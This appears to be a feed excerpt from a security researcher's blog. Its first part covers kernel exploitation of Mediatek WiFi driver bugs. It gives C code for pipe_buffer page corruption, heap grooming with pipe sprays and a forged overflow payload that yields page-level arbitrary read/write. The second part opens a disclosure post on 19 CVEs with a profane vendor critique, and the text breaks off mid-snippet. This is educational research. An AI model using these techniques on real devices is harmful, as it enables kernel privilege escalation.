a <code class="language-plaintext highlighter-rouge">seq_file</code> instead of <code class="language-plaintext highlighter-rouge">seq_operations</code>.</p>

<h3 id="tech-page-level-rw-via-pipe_bufferpage-corruption">tech: page-level r/w via pipe_buffer.page corruption</h3>

<p><strong>PoC: <code class="language-plaintext highlighter-rouge">primitives-dev-vie/vie-proc-pipes-arbrw-dev2.c</code></strong></p>

<p>This technique is inspired by PageJack (<a href="https://phrack.org/issues/71/13" target="_blank">Phrack</a> writeup). The core idea:
corrupt a <code class="language-plaintext highlighter-rouge">pipe_buffer</code>’s <code class="language-plaintext highlighter-rouge">struct page</code> pointer so that normal pipe <code class="language-plaintext highlighter-rouge">read()</code>/<code class="language-plaintext highlighter-rouge">write()</code> operations
get redirected to an arbitrary physical page, giving us page-level read/write.</p>

<h4 id="the-pipe_buffer-struct">the pipe_buffer struct</h4>

<p>The Linux pipe implementation uses
<a href="https://elixir.bootlin.com/linux/v4.4.198/source/include/linux/pipe_fs_i.h#L20" target="_blank"><code class="language-plaintext highlighter-rouge">struct pipe_buffer</code></a>
to track each chunk of data in a pipe:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">;</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span> <span class="n">len</span><span class="p">;</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span><span class="p">;</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">;</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">private</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The first field, <code class="language-plaintext highlighter-rouge">page</code>, is a pointer to the <code class="language-plaintext highlighter-rouge">struct page</code> that describes the physical memory
page backing the pipe. If we can corrupt that pointer to reference a <em>different</em> <code class="language-plaintext highlighter-rouge">struct page</code>,
then reading from or writing to the pipe will operate on whatever physical page that <code class="language-plaintext highlighter-rouge">struct page</code>
describes. In other words: page-level arbitrary read/write.</p>

<h4 id="virt_to_page-targeting-a-specific-address">virt_to_page: targeting a specific address</h4>

<p>Corrupting a <code class="language-plaintext highlighter-rouge">pipe_buffer.page</code> pointer doesn’t mean writing an arbitrary kernel virtual address
into it. The <code class="language-plaintext highlighter-rouge">page</code> field holds a pointer to a <code class="language-plaintext highlighter-rouge">struct page</code>, the kernel’s metadata struct for a
physical page frame, not the virtual address of the data itself. To target a specific kernel
address, we need to figure out which <code class="language-plaintext highlighter-rouge">struct page</code> describes the physical page backing it.</p>

<p>On ARM64, the <code class="language-plaintext highlighter-rouge">struct page</code> array lives at the <code class="language-plaintext highlighter-rouge">vmemmap</code> base address, and the mapping from a
virtual address to its <code class="language-plaintext highlighter-rouge">struct page</code> is a straightforward calculation involving the physical base
address, the page shift (12 for 4K pages), and the size of <code class="language-plaintext highlighter-rouge">struct page</code> (64 bytes on this
kernel):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define VMEMMAP_BASE    0xffffffbdc0000000
#define HEAP_PHYS       0x10000000
#define STRUCT_PAGE_SZ  0x40
#define PAGE_SHIFT      12
#define PHY_MASK        0xfffffff
</span>
<span class="kt">uint64_t</span> <span class="nf">virt_to_page</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">addr</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">VMEMMAP_BASE</span>
        <span class="o">+</span> <span class="p">((</span><span class="n">HEAP_PHYS</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">)</span> <span class="o">*</span> <span class="n">STRUCT_PAGE_SZ</span><span class="p">)</span>
        <span class="o">+</span> <span class="p">(((</span><span class="n">addr</span> <span class="o">&amp;</span> <span class="n">PHY_MASK</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">)</span> <span class="o">*</span> <span class="n">STRUCT_PAGE_SZ</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The constants are target-specific and may require calibration — the physical base address and
masking depend on the device’s memory map. Once correct, the formula is deterministic: give it a
kernel virtual address, get back the <code class="language-plaintext highlighter-rouge">struct page</code> pointer to write into the corrupted
<code class="language-plaintext highlighter-rouge">pipe_buffer</code>. On systems with KASLR, the <code class="language-plaintext highlighter-rouge">vmemmap</code> base address would need to be leaked or
computed, but <code class="language-plaintext highlighter-rouge">HEAP_PHYS</code> is typically not randomized.</p>

<h4 id="pipe_buffer-array-resizing">pipe_buffer array resizing</h4>

<p>One important implementation detail is that pipe buffers aren’t allocated individually; the kernel
allocates an <em>array</em> of <code class="language-plaintext highlighter-rouge">pipe_buffer</code> structs in a single allocation, stored in
<code class="language-plaintext highlighter-rouge">pipe_inode_info.bufs</code>. The default array holds 16 buffers, and at 40 bytes per struct, that’s 640
bytes – landing in <code class="language-plaintext highlighter-rouge">kmalloc-1024</code>. This is obviously a problem in cases where the vulnerable buffer
overflows in a different kmalloc cache (e.g. like the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> bug does).</p>

<p>Thankfully, <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays are actually elastic: they can be resized using
<code class="language-plaintext highlighter-rouge">fcntl(fd, F_SETPIPE_SZ, new_size)</code>, which causes the kernel to allocate a fresh array of the new
size and copy the existing data over. The size is specified in number of pages (each page needs one
<code class="language-plaintext highlighter-rouge">pipe_buffer</code> entry) and the count must be a power of 2.</p>

<p>This means you can control which slab cache the array ends up in. For <code class="language-plaintext highlighter-rouge">kmalloc-128</code>, the array needs
to hold at most 2 <code class="language-plaintext highlighter-rouge">pipe_buffer</code> structs: <code class="language-plaintext highlighter-rouge">2 × 36 = 72</code> bytes, which fits in <code class="language-plaintext highlighter-rouge">kmalloc-128</code> (at least,
it does on the WAX206).</p>

<h4 id="heap-grooming-setup-2">heap grooming setup</h4>

<p>The grooming sequence for the PoC looks like this:</p>

<ol>
  <li>Spray a large number of pipes (1024 in the PoC) — this allocates <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> structs
and the default-sized <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays (neither land in the target cache)</li>
  <li>Resize every pipe’s buffer array down to 2 entries (<code class="language-plaintext highlighter-rouge">fcntl(fd, F_SETPIPE_SZ, 2 * PAGE_SIZE)</code>),
which causes fresh <code class="language-plaintext highlighter-rouge">kmalloc-128</code> allocations for the resized arrays</li>
  <li>Mark each pipe by writing a unique identifier into it (this also confirms the pipe is functional
and primes the buffer metadata)</li>
  <li>Open holes by closing a subset of pipes, freeing every Nth pipe in a range near the tail of the
spray. The <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays that get freed open up holes adjacent to the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays
for the remaining open pipes.</li>
</ol>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* initial spray of pipes */</span>
<span class="n">spray_pipes</span><span class="p">(</span><span class="n">PIPE_SPRAY_CNT</span><span class="p">);</span>

<span class="cm">/* resize pipe_buffer arrays into kmalloc-128 */</span>
<span class="n">pipes_resize_arr</span><span class="p">(</span><span class="n">pipes</span><span class="p">,</span> <span class="n">PIPE_SPRAY_CNT</span><span class="p">,</span> <span class="n">PAGESZ</span> <span class="o">*</span> <span class="n">NUM_PIPEBUF_PER_PIPE</span><span class="p">);</span>

<span class="cm">/* mark each pipe with a unique tag for later identification */</span>
<span class="n">mark_pipes</span><span class="p">(</span><span class="n">PIPE_SPRAY_CNT</span><span class="p">);</span>

<span class="cm">/* open holes in the tail end of the spray */</span>
<span class="n">free_special_pipes</span><span class="p">(</span><span class="n">from</span><span class="p">,</span> <span class="n">to</span><span class="p">);</span>
</code></pre></div></div>

<p>One wrinkle worth flagging: closing a pipe frees <em>both</em> the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array and the
<code class="language-plaintext highlighter-rouge">pipe_inode_info</code> struct. If both happen to live in the same kmalloc cache (which they would for
<code class="language-plaintext highlighter-rouge">kmalloc-256</code>), the freed <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> goes onto the freelist right alongside the freed
<code class="language-plaintext highlighter-rouge">pipe_buffer</code> array. Since SLUB freelists are LIFO, the <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> (freed second) gets
reallocated <em>first</em>. This means the overflow might land on a <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> instead of a
<code class="language-plaintext highlighter-rouge">pipe_buffer</code> array (corrupting a <code class="language-plaintext highlighter-rouge">struct mutex</code> at the top of the struct and locking the system up
hard).</p>

<h4 id="constructing-the-payload">constructing the payload</h4>

<p>With the <code class="language-plaintext highlighter-rouge">virt_to_page()</code> function described above, we can construct the final payload: a fake
<code class="language-plaintext highlighter-rouge">pipe_buffer</code> header that will replace the first few fields of a legitimate <code class="language-plaintext highlighter-rouge">pipe_buffer</code> in an
adjacent slab slot.</p>

<p>Looking at the struct layout again:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">;</span>       <span class="c1">// 8 bytes (offset 0)</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">;</span>     <span class="c1">// 4 bytes (offset 8)</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>        <span class="c1">// 4 bytes (offset 12)</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span><span class="p">;</span>  <span class="c1">// 8 bytes (offset 16)</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">;</span>      <span class="c1">// 4 bytes (offset 24)</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">private</span><span class="p">;</span>   <span class="c1">// 8 bytes (offset 28)</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The overflow doesn’t need to cover the entire struct. We only need to overwrite the first three
fields — <code class="language-plaintext highlighter-rouge">page</code>, <code class="language-plaintext highlighter-rouge">offset</code>, and <code class="language-plaintext highlighter-rouge">len</code> — totaling 16 bytes. The remaining fields (<code class="language-plaintext highlighter-rouge">ops</code>, <code class="language-plaintext highlighter-rouge">flags</code>,
<code class="language-plaintext highlighter-rouge">private</code>) stay intact from the original, legitimate <code class="language-plaintext highlighter-rouge">pipe_buffer</code> that was already there before
the overflow. This is convenient since <code class="language-plaintext highlighter-rouge">ops</code> still points to the kernel’s <code class="language-plaintext highlighter-rouge">anon_pipe_buf_ops</code>, so when
the kernel invokes callbacks on the corrupted buffer (e.g., during <code class="language-plaintext highlighter-rouge">pipe_read()</code> or
<code class="language-plaintext highlighter-rouge">pipe_release()</code>), it calls real function pointers and doesn’t immediately crash.</p>

<p>Here’s how each field is corrupted:</p>

<ul>
  <li><strong><code class="language-plaintext highlighter-rouge">pageptr</code></strong>: the <code class="language-plaintext highlighter-rouge">struct page</code> pointer returned by <code class="language-plaintext highlighter-rouge">virt_to_page(target_addr)</code>. This is the
whole point — it redirects the pipe’s backing page to whatever kernel address we want to
read from or write to.</li>
  <li><strong><code class="language-plaintext highlighter-rouge">offset</code></strong>: the offset within the 4K page where reading/writing should begin. This is typically
calculated as the page-aligned offset of the target address (<code class="language-plaintext highlighter-rouge">target_addr &amp; 0xfff</code>), plus any
adjustment needed to skip past data we may have written during the marking phase.</li>
  <li><strong><code class="language-plaintext highlighter-rouge">len</code></strong>: controls how many bytes the kernel thinks are available to read from the pipe. Setting
this to a reasonable value like <code class="language-plaintext highlighter-rouge">0x18</code> or <code class="language-plaintext highlighter-rouge">PAGE_SIZE</code> works — the pipe’s <code class="language-plaintext highlighter-rouge">read()</code> path will use
this to determine how much data to copy out.</li>
</ul>

<p>Assembling the payload is then straightforward: fill the overflow buffer up to the boundary of
the adjacent slot, then append the fake header.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// compute the target struct page</span>
<span class="n">fake_pipe</span><span class="p">.</span><span class="n">pageptr</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">target_addr</span><span class="p">);</span>
<span class="n">fake_pipe</span><span class="p">.</span><span class="n">offset</span>  <span class="o">=</span> <span class="p">(</span><span class="n">target_addr</span> <span class="o">&amp;</span> <span class="mh">0xfff</span><span class="p">);</span>
<span class="n">fake_pipe</span><span class="p">.</span><span class="n">len</span>     <span class="o">=</span> <span class="mh">0x18</span><span class="p">;</span>

<span class="c1">// build the payload: [trigger data | padding to boundary | fake pipe_buffer header]</span>
<span class="n">payload</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">payload_size</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="n">payload_size</span><span class="p">);</span>  <span class="cm">/* fill with padding */</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">VIE_OPER_CMD</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">));</span>  <span class="cm">/* ioctl trigger prefix */</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span> <span class="o">+</span> <span class="n">oob_offset</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">fake_pipe</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">fake_pipe</span><span class="p">));</span>  <span class="cm">/* append fake header */</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">oob_offset</code> is the number of bytes from the start of the payload to the point where the
overflow crosses into the adjacent slab object. Everything before that offset is just filler that
gets written into the vulnerable object’s own allocation. Everything at and after <code class="language-plaintext highlighter-rouge">oob_offset</code> lands
in the neighbor’s memory, which is (hopefully) a <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array we sprayed there.</p>

<h4 id="poc-page-level-arbitrary-read">PoC: page-level arbitrary read</h4>

<p>The full flow for the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> PoC for this example goes like this:</p>

<ol>
  <li>Initial heap grooming setup described above</li>
  <li>Trigger the <code class="language-plaintext highlighter-rouge">iwpriv mac</code> leak to get a known kernel heap address</li>
  <li>Compute the <code class="language-plaintext highlighter-rouge">struct page</code> pointer for that leaked address</li>
  <li>Build a fake <code class="language-plaintext highlighter-rouge">pipe_buffer</code> header with the computed <code class="language-plaintext highlighter-rouge">page</code> pointer</li>
  <li>Trigger the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> overflow to overwrite an adjacent <code class="language-plaintext highlighter-rouge">pipe_buffer</code> with the forged
header</li>
  <li>Iterate through the remaining pipes looking for one whose marker value doesn’t match its index (indicating
its <code class="language-plaintext highlighter-rouge">page</code> pointer was redirected and we’re reading from some other location)</li>
  <li>Read from the corrupted pipe; the data comes from the target page if we succeeded</li>
</ol>

<p>Here it is in action.</p>

<p><img src="/assets/images/mtk-images/mtk-vie-pipebuf-read.png" alt="mtk-vie-pipebuf-read.png" /></p>

<p>The “Z”s (<code class="language-plaintext highlighter-rouge">0x5a</code>) are the marker bytes written at the address leaked via the <code class="language-plaintext highlighter-rouge">iwpriv mac</code> command.
They’re coming back through the pipe’s <code class="language-plaintext highlighter-rouge">read()</code>, confirming the corrupted <code class="language-plaintext highlighter-rouge">pipe_buffer</code> is
reading from the target page. Page-level arbitrary read, just like that. And by writing into this
corrupted pipe, we get page-level arbitrary write!</p>

<h4 id="practical-caveat-pipe-resize-privilege-requirements">practical caveat: pipe resize privilege requirements</h4>

<p>This is probably the most powerful primitive covered in this post: page-level arbitrary read/write
through a normal pipe fd. However, there’s a practical caveat for cases where the resizing trick is
necessary. <code class="language-plaintext highlighter-rouge">CAP_SYS_RESOURCE</code> is commonly required for pipe capacity changes via <code class="language-plaintext highlighter-rouge">F_SETPIPE_SZ</code>,
which makes the resizing technique most applicable in contexts where the capability is available or
on kernels with permissive <code class="language-plaintext highlighter-rouge">F_SETPIPE_SZ</code> handling.</p>

<h2 id="closing-thoughts">closing thoughts</h2>

<p>Aaaaand, we’re done! I hope at least some of this info will be useful to you in your own exploit dev
adventures, especially if you’re also new to kernel exploitation like I am. As mentioned at the top
of the post, none of the techniques here are novel, so the real goal here is to just compile some of
this info in one place for easier reference. Even though all of these techniques are well-known,
becoming familiar with the prior art can really help you understanding the fundamental concepts
being applied and extrapolate them to come up with new techniques that work for your specific target
environment.</p>

<p>To recap, starting from a heap overflow and a heap address leak, we accomplished:</p>

<ul>
  <li><strong>OOB read</strong>: inflated <code class="language-plaintext highlighter-rouge">msg_msg.m_ts</code> for leaking adjacent slab data</li>
  <li><strong>Arbitrary address read + free</strong>: corrupted <code class="language-plaintext highlighter-rouge">msg_msg.next</code> for reading from and freeing a chosen
kernel address</li>
  <li><strong>Code execution</strong>: <code class="language-plaintext highlighter-rouge">seq_operations</code> function pointer corruption for RIP control, plus the
<code class="language-plaintext highlighter-rouge">kfree()</code> trick for inducing use-after-frees</li>
  <li><strong>Page-level R/W</strong>: <code class="language-plaintext highlighter-rouge">pipe_buffer.page</code> corruption for redirecting pipe I/O to arbitrary physical
pages</li>
</ul>

<p>I know this probably isn’t as exciting as a post talking about fully weaponized exploits but I
assure you those are coming. As typically happens, I ended up revisiting some of the exploits during
the process of writing this post and ended up coming up with some stuff that’s way more fun than
what was initially planned anyway. There should be at least 1-2 posts coming soon, so be on the
lookout.</p>

<p>The PoC code for all of the techniques discussed is available in the linked repository.</p>

<h2 id="references--further-reading">references + further reading</h2>

<h3 id="code">code</h3>

<ul>
  <li><a href="https://github.com/mellow-hype/mtk-kernel-alchemy" target="_blank">PoCs Repo</a></li>
</ul>

<h3 id="writeupspaperstalks">writeups/papers/talks</h3>

<ul>
  <li><a href="https://www.youtube.com/watch?v=2hYzxsWeNcE">SLUB Allocator for Exploit Developers</a> (video)</li>
  <li><a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">Linux Kernel Heap Feng Shui in 2022</a></li>
  <li><a href="https://devilinside.me/blogs/small-steps-kernel-exploitation">Common kernel objects and their attributes</a></li>
  <li><a href="https://www.interruptlabs.co.uk/articles/pipe-buffer">About pipe_buffer exploitation</a></li>
  <li><a href="https://phrack.org/issues/71/13">PageJack Phrack article</a> / <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">PageJack BlackHat paper</a></li>
  <li><a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html#exploring-struct-msg_msg" target="_blank">OOB Write to msg_msg for arb read</a></li>
  <li><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html" target="_blank">Four Bytes of Power (arb free/leak with msg_msg)</a></li>
  <li><a href="https://terawhiz.github.io/2025/2/oob-write-to-page-uaf-lactf-2025/" target="_blank">OOB Write to Page UaF</a></li>
  <li><a href="https://www.willsroot.io/2022/01/cve-2022-0185.html" target="_blank">msg_msg abuse for OOB read/arbitrary read</a></li>
</ul>

<h3 id="kernel-source-references">kernel source references</h3>

<ul>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/ipc/msg.c#L765" target="_blank"><code class="language-plaintext highlighter-rouge">do_msg_fill()</code></a></li>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/ipc/msgutil.c#L156" target="_blank"><code class="language-plaintext highlighter-rouge">store_msg()</code></a></li>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/ipc/msgutil.c#L174" target="_blank"><code class="language-plaintext highlighter-rouge">free_msg()</code></a></li>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/include/linux/mm_types.h#L44" target="_blank"><code class="language-plaintext highlighter-rouge">struct page</code></a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="0days" /><category term="exploits" /><category term="mediatek" /><category term="kernel" /><summary type="html"><![CDATA[Part 1 in a small series of posts covering the development of kernel exploit primitives, demonstrated with a few bugs in the Mediatek MT76xx wifi driver.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/mtk-images/mtk-vie-seqops.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/mtk-images/mtk-vie-seqops.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">mediatek? more like media-REKT, amirite.</title><link href="https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite.html" rel="alternate" type="text/html" title="mediatek? more like media-REKT, amirite." /><published>2025-12-15T00:00:00+00:00</published><updated>2025-12-15T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite</id><content type="html" xml:base="https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite.html"><![CDATA[<p>It’s been over a year since my last post but I assure you it hasn’t been from a lack of bugs. Here’s a bit of proof! This post provides high-level RCAs and proof-of-concept exploits for 19 vulnerabilities in Mediatek WiFi chipsets that were disclosed this year. I’ll also tell you a little story about my experience dealing with Mediatek during the process of disclosing these bugs to them. I hope you’ll get a nice laugh out of it :)</p>

<h2 id="introduction">introduction</h2>

<p>Hello again! It’s been a while since I’ve posted and it’s been a busy year as usual (including a Pwn2Own win with the boys @SummoningTeam!). This post is going to be a sort of year-in-review for the work I’ve done on Mediatek WiFi chipsets. The bugs discussed below affect the MediaTek MT76xx and MT7915 Wifi chipset family; most of them were found over the course of ~3 months early in the year but were only made public over the past couple of months. A few others were technically discovered last year but were only made public this year. While the 3-month thing might sound impressive, the journey leading up to those three months took 2 years to get through. It’s true what they say, though: once you become familiar enough with a target the bugs just fall right out! Overall, these bugs were a fun introduction to kernel exploitation and being limited to a testbed with basically 0 debugging capabilities was a fun challenge for exploit development.</p>

<p>Along with the bugs, I’m also including a little story I thought might be a kick for those familiar with dealing with vendors and disclosure. An interesting bit of lore: I’d originally planned on releasing the details of these issues via “uncoordinated” disclosure earlier this year, when I wrote the first draft of this post. Better heads ultimately prevailed and I avoided that bag of bees but I hope the story below will give you an idea of <em>why</em> I had considered it.</p>

<p>The reason I chose to include the story at all is because I don’t think companies should be able to hide their shitty behavior behind arbitrary policies they come up with. Coordinated disclosure is an act of good faith and vendors who act in bad faith deserve to be named-and-shamed. Especially when their behavior calls into question their integrity and credibility in assessing the impact of the vulnerabilities in their products. I think the story below will show you exactly what I mean.</p>

<p>I’ll be diving deeper into the discovery and exploitation of a couple of these bugs in future posts, so stick around! But for now, let’s just get on with it.</p>

<p><strong>NOTE: all code snippets included in this post are pseudo-code representative of how the bugs manifest.</strong></p>

<h3 id="the-story-a-glimpse-into-the-madness">the story: a glimpse into the madness</h3>

<p>I’ve intentionally left out <strong>a lot</strong> of context in the interest of brevity and for…reasons. Let’s just say there were <em>incentives</em> for Mediatek to invalidate or downgrade the severity of the bugs I had reported. I’ll just leave it at that. This is the most blatant example but definitely not the only time Mediatek behaved…questionably throughout the process.</p>

<p>At some point during the (nearly 6-month-long) disclosure process for these bugs, the issue was raised about the requirement of root privileges for executing <code class="language-plaintext highlighter-rouge">iwpriv set</code> commands for a particular report. I clarified that the privilege needed was <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>, but otherwise didn’t argue that point and it was agreed that some privileges were required for a subset of reported issues which were triggered via the <code class="language-plaintext highlighter-rouge">iwpriv set</code> interface. They reduced the impact from High to Medium for one of those issues.</p>

<p>Then a couple of days later, they reduced the impact for almost <em>all</em> of the remaining issues from High to Medium without providing any reason for doing so. When I asked about this for the bugs which <em>weren’t</em> affected by the privilege requirement we’d discussed, they responded by asking me to describe the steps for <em>how I added an unprivileged user</em> and <em>whether root privileges were required to add an unprivileged user</em> for one of the reports they’d reduced the severity of (ignoring all the others I’d asked about). I could barely even understand what that question was supposed to mean given the context. Because I’d used an unprivileged user to execute the PoC in my report, they were asking me whether I would have needed privileges to add that user (implying they think that’s something an attacker would need to do??). So I clarified that I added the steps to add an unprivileged user in my reproduction steps for the benefit of their engineers and <strong>to prove that privileges were not required</strong> to exploit the bug, and that the attacker would <em>be</em> the unprivileged user in an exploit scenario.</p>

<p>And then they hit me with an absolute <strong>banger</strong>: they claimed that, actually, their “default design” doesn’t consider the existence of unprivileged users, and all users are considered to be privileged, therefore <em>privileges are always required</em> and the CVSS is reduced to medium.</p>

<p>For a Linux kernel driver…provided as part of an SDK to OEM vendors…for chipsets supported on embedded and desktop/consumer devices…</p>

<p><img src="/assets/images/big-brain.png" alt="nice" /></p>

<p>I’ll let you sit with that one for a second. It’s makes even less sense the longer you think about it.</p>

<p>Their exact words (nearly indecipherable within the context of the discussion) were:</p>

<blockquote>
  <p>In our default design, we do not consider multiple user cases. By default, the system only has a privileged user, making the malicious actor more difficult to conduct the attack. This is unlike Android OS apps which can be directly downloaded from Google Play store.</p>
</blockquote>

<p>That’s right. A multi-billion dollar company responsible for producing chipsets that are used across millions of devices says <em>this</em> is how they conceptualize the security of their products. This would be completely disqualifying <em>if they actually meant it</em>.</p>

<p>By this definition of their “default design”, local privilege escalation is <em>impossible</em> for these drivers. Except, <strong>they’ve been issuing CVEs and advisories for these chipsets for years, where they explicitly mention the lack of privileges required and the impact as local privilege escalation</strong>. Like, literally, they’ve issued CVEs for bugs <em>I reported <strong>this year</strong></em>, with this exact language.</p>

<p><img src="/assets/images/mediarekt-disclosure-messaging.png" alt="example 1" /></p>

<p>You can’t make this shit up. Are y’all fucking hearing this??? Interestingly, if you take a look at their most recent advisories, they no longer include <em>any</em> information about the impact. They started doing this after I had pointed out the discrepancy between their supposed “default design” and their classification of past bugs. It gives me the impression that they want to be able to use this bullshit argument in the future with other researchers and they’re trying to cover their bases.</p>

<p>To drive the point home even further (which I don’t think is needed at this point): what would have been the point of raising the issue of the <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code> privilege requirement mentioned at the beginning of the story if no concept of privilege separation even exists in their “default design”?</p>

<p>The answer is that <strong>they were lying</strong>. They were trying to lie to me and they were trying to lie to their customers and partners. They should be embarrassed. Wouldn’t <em>you</em> be embarassed to say this kind of stuff in public? Franky, it’s <strong>insulting</strong>. Only someone who doesn’t know shit about how this stuff works would be fooled by these arguments. The alternative is that they actually believe what they’re saying, which doesn’t seem much better.</p>

<p>It begs the question, though: <em>why were they willing to behave in such an obviously dishonest way?</em> I have some thoughts but I’ll leave that up to your imagination, dear reader. I will say this: companies will be as bad as they’re allowed and incentivized to be.</p>

<p>Anyway, after I’d made the decision to <strong>not</strong> go with “uncoordinated” disclosure, I thought I’d remind the folks I was dealing with that I would be under no obligation to not discuss their behavior publicly (as I’m doing now) <em>after</em> the CVEs were made public, along with all the proof needed to show their assessments were faulty. And wouldn’t you know it…that post-nut clarity hit and they dropped (<em>most</em> of) their bullshit arguments.</p>

<p>It’s funny how that works, isn’t it?</p>

<p>In conclusion: <strong><em>fuck it, we ball</em></strong>. Let’s move onto the bugs. These might give you a good laugh, too!</p>

<h2 id="the-bugs">the bugs</h2>

<h3 id="cve-2025-70631-heap-overflow-in-setpsk-ioctl-handler">CVE-2025-70631: Heap Overflow in SETPSK Ioctl Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4, v5.1.0.0; MT7629 driver v6.0.3.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), Starlink Wifi Gen2</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">WSC_AP_SUPPORT</code></li>
</ul>

<p>The handler code responsible for handling the <code class="language-plaintext highlighter-rouge">RT_OID_SET_PSK</code> OID is found in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code>. The root cause of the vulnerability is improper bounds checking of the attacker-controlled <code class="language-plaintext highlighter-rouge">iwreq.u.data.length</code> value passed from userspace. An initial check is done on this value to ensure it does not exceed the max of 65 bytes, but failing this check does not immediately trigger an error if the driver is built with <code class="language-plaintext highlighter-rouge">WSC_AP_SUPPORT</code> feature. In this case, a field <code class="language-plaintext highlighter-rouge">pWscControl</code> from the wireless interface’s device structure is checked; if its not NULL, the operation proceeds and ends up calling <code class="language-plaintext highlighter-rouge">copy_from_user()</code> with the attacker controlled length value into the <code class="language-plaintext highlighter-rouge">pWscControl-&gt;WpaPsk</code> field. This is where the overflow occurs.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="k">if</span> <span class="p">(</span><span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span> <span class="o">&lt;</span> <span class="mi">65</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">pWscControl</span><span class="p">)</span> <span class="p">{</span>
			<span class="c1">// VULNERABLE copy_from_user()</span>
